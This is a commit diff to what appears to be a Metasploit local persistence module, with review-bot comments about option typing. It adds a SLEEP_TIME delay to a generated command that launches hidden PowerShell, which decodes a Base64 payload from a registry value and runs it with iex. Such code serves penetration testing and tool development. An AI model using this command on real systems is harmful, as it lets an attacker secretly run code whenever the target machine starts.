Added a SLEEP_TIME option
Added a SLEEP_TIME option which is the number of seconds to sleep prior to executing the initial IEX request. This is useful in cases where a machine would have to establish a VPN connection, initiated by the user, after a reboot. Alternatively, as opposed to a sleep time, it could have a loop that attempts to retry for a certain period of time.
bug/bundler_fix
parent
089a006408
commit
1fe8bc9cea
|
@ -53,6 +53,8 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
[false, 'The name to use for the \'Run\' key. (Default: random)' ]),
|
||||
OptBool.new('CREATE_RC',
|
||||
[false, 'Create a resource file for cleanup', true]),
|
||||
OptString.new('SLEEP_TIME',
|
||||
[false, 'Amount of time to sleep (in seconds) before executing payload. (Default: 0)', 0]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
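Review bot: SLEEP_TIME is declared with `OptString.new` but holds a number of seconds and is given the integer default `0`, so nothing validates the value when the option is set. An integer option type (`OptInt.new('SLEEP_TIME', ...)`) would reject non-numeric input up front instead of relying on the later `.to_i` conversion. The description also repeats "(Default: 0)" although the default is already passed as the third array element, so one of the two can be dropped.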
@ -66,7 +68,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def generate_cmd(root_path, blob_key_name, blob_key_reg)
|
||||
cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
|
||||
cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"sleep #{datastore['SLEEP_TIME'].to_i}; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
|
||||
return cmd
|
||||
end
|
||||
|
||||
|
|
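Review bot: in generate_cmd, `datastore['SLEEP_TIME'].to_i` silently turns any non-numeric string into 0, and the `sleep ...;` prefix is written into the command even when the option is left at its default, so every run of the module now produces a different command line than before this change. Consider validating the value where the option is read and only prepending the sleep when it is greater than zero, with a comment on the method noting what the delay is for. The commit message also mentions a retry loop as an alternative to a fixed delay. If that is the intended follow-up, a short TODO here would record it.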